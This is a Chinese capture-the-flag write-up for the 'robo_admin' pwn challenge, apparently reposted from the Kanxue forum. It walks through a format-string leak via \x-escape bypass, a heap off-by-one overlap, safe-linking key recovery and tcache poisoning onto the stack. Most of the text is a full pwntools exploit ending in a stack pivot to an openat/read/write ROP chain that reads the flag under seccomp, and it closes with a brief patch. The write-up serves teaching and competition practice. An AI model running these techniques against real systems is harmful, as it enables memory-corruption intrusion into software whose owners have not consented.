第二届软件系统安全赛robo_admin题解

admin 2026-05-22 01:52:08 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详细解析了第二届软件系统安全赛robo_admin题的漏洞利用过程。程序存在一次性格式化字符串漏洞和堆off-by-one溢出漏洞,通过格式化字符串泄露密码、PIE基址和libc地址,利用堆风水构造chunkoverlap绕过memset和截断限制泄露堆基址,最终通过栈迁移和ORWROP链在seccomp限制下读取flag。关键步骤包括转义字符绕过过滤、tcachepoisoning实现任意地址分配、openat替代open系统调用。 综合评分: 92 文章分类: CTF,二进制安全,漏洞分析,红队,渗透测试


cover_image

第二届软件系统安全赛 robo_admin 题解

S1nyer S1nyer

看雪学苑

2026年5月21日 18:06 上海

在小说阅读器读本章

去阅读

01

程序分析

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

题目还开了 seccomp,禁了三个系统调用:

  • open
  • execve
  • execveat

程序有两层菜单,主菜单里最关键的是set_notice/show_status

sub_1447(s, 512LL);
if ( strchr(s, 37) || strchr(s, 36) )
puts("[X] raw input contains illegal chars");
else if ( sub_1528(s, src, 256LL) )
puts("[X] decode failed");
else
memcpy(byte_51C0, src, 0x100);
printf("Notice: ");
if ( dword_52C0 )
{
if ( dword_52C4 )
printf("%s", byte_51C0);
else
  {
    dword_52C4 = 1;
printf(byte_51C0);
  }
}

这里有两个点:

  • 原始输入里不能直接出现%$,但支持\x转义解码,所以可以用\x25\x24还原格式化串

  • printf(byte_51C0)

    只会执行一次,是一个一次性格式化字符串

管理员菜单的漏洞更直接:

v0 = sub_1C1D("Write length :", 1LL, qword_5180[idx] + 1LL);
v7 = read(0, heaps[idx], v0);
if ( qword_5180[idx] <= v7 )
&nbsp; heaps[idx][qword_5180[idx] - 1] = 0;
else
&nbsp; heaps[idx][v7] = 0;

edit允许写到cap + 1,因此可以做到一字节堆溢出。但有两个恶心的限制:

  • 总会补一个\0

  • query

    又都是按%s打印

再看create

heaps[idx] =&nbsp;malloc(size);
memset(heaps[idx],&nbsp;0, size);

这意味着常规的 overlap 泄露并不好做:

  • 新申请的块会被memset清干净
  • 就算 overlap 到了 free chunk,edit补的\0也很容易把字符串截断

所以这题表面是“格式化字符串 + 堆菜单 + off-by-one”,但我觉得难点其实是:memset\0截断同时存在的情况下,怎么稳定读到 free chunk 里的指针数据。

02

漏洞利用

Step1 格式化字符串泄露关键信息

管理员密码不是固定值,而是程序启动时随机生成的两段 8 字节数据:

snprintf(s,&nbsp;0x28uLL,&nbsp;"%016lx%016lx", qword_52D0, qword_52D8);
if&nbsp;( !strcmp(s1,&nbsp;"ROBOADMIN") && !strcmp(v14, s) )

所以第一步必须先把 password 泄露出来,看汇编发现show_status函数有把password写到栈上。

由于 notice 支持\x解码,我们可以把 payload 写成:

payload&nbsp;=&nbsp;b"\\x256\\x24p&nbsp;\\x257\\x24p&nbsp;\\x2515\\x24p&nbsp;\\x2523\\x24p&nbsp;\\x2514\\x24p"

解码后就是:

%6$p %7$p %15$p %23$p %14$p
  • %6$p

    %7$p泄露 password 的两半

  • %15$p

    泄露 PIE

  • %23$p

    泄露 libc

  • %14$p

    拿一个栈地址

Step2 分析堆布局

这题登录前会经过 seccomp 初始化,libseccomp 会在堆上留下大量分配/释放痕迹,导致登录之后的 heap 并不干净。

这里实际观察到的关键 bin 状态如下:

tcache[0x60]:&nbsp;0x...d2a0&nbsp;->0x...e900
tcache[0x30]:&nbsp;0x...d300&nbsp;->0x...d460
tcache[0xd0]:&nbsp;0x...db10&nbsp;->0x...d7e0&nbsp;->0x...d350
tcache[0x40]:&nbsp;0x...dcd0&nbsp;->0x...d9a0&nbsp;->0x...d670&nbsp;->&nbsp;...
unsortbin:&nbsp;0x5d57ca34d9d0&nbsp;(size :&nbsp;0xf0)

发现tcache[0x60][0]tcache[0x30][0]的地址相邻(0xd2a0和0xd300),又发现和tcache[0x30][0]最近的是tcache[0xd0][2](0x…d350),它们中间夹了个0x20大小的fastbin。

add(0,&nbsp;"A",&nbsp;0x58) &nbsp;&nbsp;# 0x...d2a0
add(1,&nbsp;"B",&nbsp;0x28) &nbsp;&nbsp;# 0x...d300
add(2,&nbsp;"C",&nbsp;0xc8) &nbsp;&nbsp;# 0x...db10
add(3,&nbsp;"D",&nbsp;0xc8) &nbsp;&nbsp;# 0x...d7e0
add(4,&nbsp;"E",&nbsp;0xc8) &nbsp;&nbsp;# 0x...d350
add(5,&nbsp;"cls",&nbsp;0x28)&nbsp;# 0x...d460

利用off-by-one修改B的size为0x91,构造chunk overlap

edit(0,&nbsp;0x59, b'A'*0x58 +&nbsp;p8(0x91))

真正参与 overlap 的其实只有三块

A: [0x...d290, size=0x60]
B: [0x...d2f0, size=0x30]
E: [0x...d340, size=0xd0]

修改E的数据域绕过glibc检查

如果把B视为一个0x90chunk,那么:

  • nextchunk = d380

  • nextchunk->size

    d388

  • 再往后一个 chunk 的sized3a8

所以要先在E里面伪造两个最小合法 chunk 头:

fake_chunk = flat(
&nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; 0x38: p64(0x21),
&nbsp; &nbsp; &nbsp; &nbsp; 0x58: p64(0x21),
&nbsp; &nbsp; },
&nbsp; &nbsp; filler=b"\x00",
)
edit(4, 0x60, fake_chunk)

这里顺手还要做以下堆风水:

  • 申请一个稍大的块把unsortedbin清走
  • tcache[0x90]填满,保证 fake0x90chunk 在free时进unsorted
  • 吃掉smallbin[0x60],保证从unsorted切割块
  • 清空tcache[0x30],保证后面malloc(0x28)一定吃到我们 split 出来的 remainder

这里没有走“大块合并 -> unsorted/largebin”那套路线,因为题目限制申请大小< 0x200

Step3 泄露heap基址

free(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# free fake&nbsp;0x90(B)
add(7, "F",&nbsp;0x40)
add(1, "X",&nbsp;0x28)

申请0x40时,对应 chunk size 是0x50,所以 fake0x90chunk 会被切成:

[0x...d2f0, size=0x50] &nbsp; 已分配给 slot7
[0x...d340, size=0x40] &nbsp; remainder

注意这个remainder的 chunk 头正好落在E原来的位置上。

申请0x28时,对应 chunk size 是0x30,此时0x40remainder 再 split 只会剩下0x10,不满足最小 chunk 尺寸,因此 glibc 会把整个0x40chunk 返回。于是新的 user 指针就是0x...d350

也就是E的 user 起点

所以这一步结束之后:

  • slot1->desc == 0x...d350
  • slot4->desc == 0x...d350

这一点非常重要,它绕开了这题最烦的两个限制:

  • create

    memset新 chunk,残留元数据很难保住

  • edit

    总会补\0,普通字符串泄露很容易被截断

现在不一样了。后面只要把slot4free 掉,tcache 写进去的fd就会直接落在slot1看到的 user 开头。字符串从泄露数据本身开始,就不会再被前面的\0卡死。

tcache[0x40]原本就已经有 6 个节点,头结点是0x...dcd0,所以 freed chunk 开头被写入的是:

fd&nbsp;= (heap_base +&nbsp;0xcd0) ^ (0x...d350 >>&nbsp;12)

读取fd后还原:

leak = uu64()
z = leak ^ 0xcd0

key = 0
prev = 0
for i in range(0, 64, 12):
&nbsp; &nbsp; cur = ((z >> i) & 0xfff) ^ prev
&nbsp; &nbsp; key |= cur << i
&nbsp; &nbsp; prev = cur

heap_base = key << 12

Step4 栈迁移 + ORW ROP收尾

拿到heap_base之后,接下来的事情就简单了。slot1仍然指向刚刚 free 掉的0x40chunk,所以我们可以改它的fd为栈地址,完成任意地址分配到栈。

retaddr = stackaddr -&nbsp;0x30
edit(1,&nbsp;0x10, p64(retaddr ^ key))
free(5) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 腾出 slot index,和 poison 无关
add(5,&nbsp;"tc",&nbsp;0x38) &nbsp; &nbsp; &nbsp;# 取走 head
add(4,&nbsp;"migrate",&nbsp;0x38)&nbsp;# 返回 retaddr

之后

  • 在一块大 chunk 里放 ROP 链
  • 在另一块 chunk 里放/flag
  • 覆盖admin_menu函数的stack contextleave; ret栈迁移

我这里把 ROP 链写在slot3对应的0xc8chunk 里,把/flag写在一块普通缓冲里。由于 seccomp 禁掉了open,所以用openat。

elf.address = pie
libc.address = libcbase
rop = ROP([elf, libc])
ropaddr = heap_base+0x7e0
flagaddr = heap_base+0xa70
edit(6, 0x10, b"/flag")
rop.raw(p64(0))
rop.call("openat", [-100, flagaddr, 0])
rop.call("read", [3, flagaddr+0x10, 0x50])
rop.call("write", [1, flagaddr+0x10, 0x50])
#print(rop.dump())
edit(3, 0xc8, rop.chain())

栈迁移覆盖内容:

leave_ret = elf.search(asm("leave;ret")).__next__()
edit(4, 0x38, flat(ropaddr, leave_ret))
menu(6)

完整Exp

from&nbsp;pwn&nbsp;import&nbsp;*
import&nbsp;struct

def&nbsp;debug(c =&nbsp;0):
if(c):
&nbsp; &nbsp; &nbsp; &nbsp; gdb.attach(p, c)
else:
&nbsp; &nbsp; &nbsp; &nbsp; gdb.attach(p)
def&nbsp;get_addr():
return&nbsp;u64(p.recvuntil(b'\x7f')[-6:].ljust(8,&nbsp;b'\x00'))

def&nbsp;get_sb():
return&nbsp;libc.sym['system'],&nbsp;next(libc.search(b'/bin/sh\x00'))

def&nbsp;rol(value, shift, bits=64):
return&nbsp;((value << shift) & (2**bits -&nbsp;1)) | (value >> (bits - shift))

sd =&nbsp;lambda&nbsp;data : p.send(data)
sa &nbsp;=&nbsp;lambda&nbsp;text,data &nbsp;:p.sendafter(text, data)
sl &nbsp;=&nbsp;lambda&nbsp;data: p.sendline(data&nbsp;if&nbsp;isinstance(data,&nbsp;bytes)&nbsp;else&nbsp;str(data).encode())
sla =&nbsp;lambda&nbsp;text,data &nbsp;:p.sendlineafter(text, data&nbsp;if&nbsp;isinstance(data,&nbsp;bytes)&nbsp;else&nbsp;str(data).encode())
rc &nbsp; =&nbsp;lambda&nbsp;num=4096&nbsp; &nbsp;:p.recv(num)
ru &nbsp;=&nbsp;lambda&nbsp;text &nbsp; :p.recvuntil(text)
rl &nbsp;=&nbsp;lambda&nbsp;    :p.recvline()
pr =&nbsp;lambda&nbsp;num=4096&nbsp;:print(p.recv(num))
ia &nbsp; =&nbsp;lambda&nbsp; &nbsp; &nbsp; &nbsp; :p.interactive()
l32 =&nbsp;lambda&nbsp; &nbsp; :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 =&nbsp;lambda&nbsp; &nbsp; :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 &nbsp; &nbsp;=&nbsp;lambda&nbsp; &nbsp; :u32(p.recv(4).ljust(4,b'\x00'))
uu64 &nbsp; &nbsp;=&nbsp;lambda&nbsp; &nbsp; :u64(p.recv(6).ljust(8,b'\x00'))
uheap &nbsp; =&nbsp;lambda&nbsp; &nbsp; :u64(p.recv(6).ljust(8,b'\x00'))
logaddr =&nbsp;lambda&nbsp;s, n &nbsp; :p.success('%s -> 0x%x'&nbsp;% (s, n))

context.terminal = ['gnome-terminal',&nbsp;'-x',&nbsp;'sh',&nbsp;'-c']
file =&nbsp;"./pwn"
libc =&nbsp;"./libc.so.6"

def&nbsp;login(pwd):
&nbsp; &nbsp; sla("> \n",&nbsp;str(3))
&nbsp; &nbsp; sla("Token:\n",&nbsp;"ROBOADMIN")
&nbsp; &nbsp; sla("(32 hex):\n", pwd)
if&nbsp;b"login success"&nbsp;in&nbsp;rl():
&nbsp; &nbsp; &nbsp; &nbsp; success("login success!")
return&nbsp;1
else:
print("\033[31mlogin failed!\033[0m")
return&nbsp;0
def&nbsp;menu(idx):
&nbsp; &nbsp; sla("> ",&nbsp;str(idx))

def&nbsp;add(idx, name, size):
&nbsp; &nbsp; menu(1)
&nbsp; &nbsp; sla("Index:\n",&nbsp;str(idx))
&nbsp; &nbsp; sla("Task name:\n", name)
&nbsp; &nbsp; sla("Desc size:\n",&nbsp;str(size))

def&nbsp;edit(idx, size, cont):
&nbsp; &nbsp; menu(2)
&nbsp; &nbsp; sla("Index:\n",&nbsp;str(idx))
&nbsp; &nbsp; sla("Write length :",&nbsp;str(size))
&nbsp; &nbsp; sa("New desc bytes:", cont)

def&nbsp;show(idx):
&nbsp; &nbsp; menu(3)
&nbsp; &nbsp; sla("Index:\n",&nbsp;str(idx))
&nbsp; &nbsp; ru(" => ")

def&nbsp;free(idx):
&nbsp; &nbsp; menu(5)
&nbsp; &nbsp; sla("Index:\n",&nbsp;str(idx))

context.binary = elf = ELF("./pwn")
context.arch =&nbsp;"amd64"
context.log_level =&nbsp;"debug"&nbsp;if&nbsp;args.D&nbsp;else&nbsp;"info"
p = process(file)
elf = ELF(file,&nbsp;False)
libc = ELF(libc,&nbsp;False)

payload =&nbsp;"\\x256\\x24p \\x257\\x24p \\x2515\\x24p \\x2523\\x24p \\x2514\\x24p"
ru("> \n")
sl(str(1))
sleep(0.5)
sl(payload)
ru("> \n")
#debug("b *$rebase(0x1A4A)")
#pause()
sl(str(2))
ru("Notice: ")
leaks = rl().split(b' ')
#print(leaks)

pwd = leaks[0][2:] + leaks[1][2:]
success("password: %s", pwd.decode())
pie =&nbsp;int(leaks[2],&nbsp;16) -&nbsp;0x2893
libcbase =&nbsp;int(leaks[3],&nbsp;16) -&nbsp;0x29d90
stackaddr =&nbsp;int(leaks[4],&nbsp;16)
if&nbsp;not&nbsp;login(pwd):
&nbsp; &nbsp; exit(0)

add(0,&nbsp;"clear",&nbsp;0x180)&nbsp;# clear unsortedbin
free(0)

# fill tcache
for&nbsp;i&nbsp;in&nbsp;range(7):
&nbsp; &nbsp; add(i,&nbsp;f"T{i}",&nbsp;0x80)
for&nbsp;i&nbsp;in&nbsp;range(7):
&nbsp; &nbsp; free(i)

add(0,&nbsp;"A",&nbsp;0x58)
add(1,&nbsp;"B",&nbsp;0x28)
add(2,&nbsp;"C",&nbsp;0xc8)
add(3,&nbsp;"D",&nbsp;0xc8)
add(4,&nbsp;"E",&nbsp;0xc8)
add(5,&nbsp;"cls",&nbsp;0x28)
add(6,&nbsp;"clear",&nbsp;0x48)&nbsp;# clear smallbin

fake_chunk = flat(
&nbsp; &nbsp; {
0x38: p64(0x21),
0x58: p64(0x21),
&nbsp; &nbsp; },
&nbsp; &nbsp; filler=b"\x00",
)
edit(4,&nbsp;0x60, fake_chunk)
edit(0,&nbsp;0x59,&nbsp;b'A'*0x58&nbsp;+ p8(0x91))
free(1)
add(7,&nbsp;"F",&nbsp;0x40)
add(1,&nbsp;"X",&nbsp;0x28)
free(4)
show(1)

leak = uu64()
z = leak ^&nbsp;0xcd0
key =&nbsp;0
prev =&nbsp;0
for&nbsp;i&nbsp;in&nbsp;range(0,&nbsp;64,&nbsp;12):
&nbsp; &nbsp; cur = ((z >> i) &&nbsp;0xfff) ^ prev
&nbsp; &nbsp; key |= cur << i
&nbsp; &nbsp; prev = cur

heap_base = key <<&nbsp;12
logaddr("heapbase", heap_base)
logaddr("pie", pie)
logaddr("libcbase", libcbase)
logaddr("stack", stackaddr)

elf.address = pie
libc.address = libcbase
rop = ROP([elf, libc])
ropaddr = heap_base+0x7e0
flagaddr = heap_base+0xa70
edit(6,&nbsp;0x10,&nbsp;b"/flag")
rop.raw(p64(0))
rop.call("openat", [-100, flagaddr,&nbsp;0])
rop.call("read", [3, flagaddr+0x10,&nbsp;0x50])
rop.call("write", [1, flagaddr+0x10,&nbsp;0x50])
#print(rop.dump())
edit(3,&nbsp;0xc8, rop.chain())

leave_ret = elf.search(asm("leave;ret")).__next__()
retaddr = stackaddr-0x30
edit(1,&nbsp;0x10, p64(retaddr ^ key))
free(5)
add(5,&nbsp;"tc",&nbsp;0x38)
#debug("b *$rebase(0x2635)")
#pause()
add(4,&nbsp;"migrate",&nbsp;0x38)
edit(4,&nbsp;0x38, flat(ropaddr, leave_ret))
menu(6)

ia()

03

漏洞修补

根据题目描述进行修复的

请同时检查 set_notice() 与 show_status() 两处逻辑;若拦截了解码后的危险字符,错误输出中应包含 “[X] decoded input contains illegal chars”。

对\x转换后的字符进行检查,过滤了%字符,同时将[X] decoded input contains illegal chars字符串写到eh_frame段,修改错误输出为题目要求即可。

#

#

看雪ID:S1nyer

https://bbs.kanxue.com/user-home-977553.htm

*本文为看雪论坛优秀文章,由 S1nyer 原创,转载请注明来自看雪社区

看雪2026 KCTF 大赛-火热征题中

往期推荐

安卓逆向基础知识之frida Hook

2025 强网杯和强网拟态部分题解

在逆向分析方面-unidbg真的适合 MCP 吗?

AI静态分析,内核模块隐藏 Frida 特征,绕过linker私有结构遍历崩溃链

某安全so库深度解析

球分享

球点赞

球在看

点击阅读原文查看更多


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:看雪学苑 S1nyer S1nyer《第二届软件系统安全赛 robo_admin 题解》

评论:0   参与:  0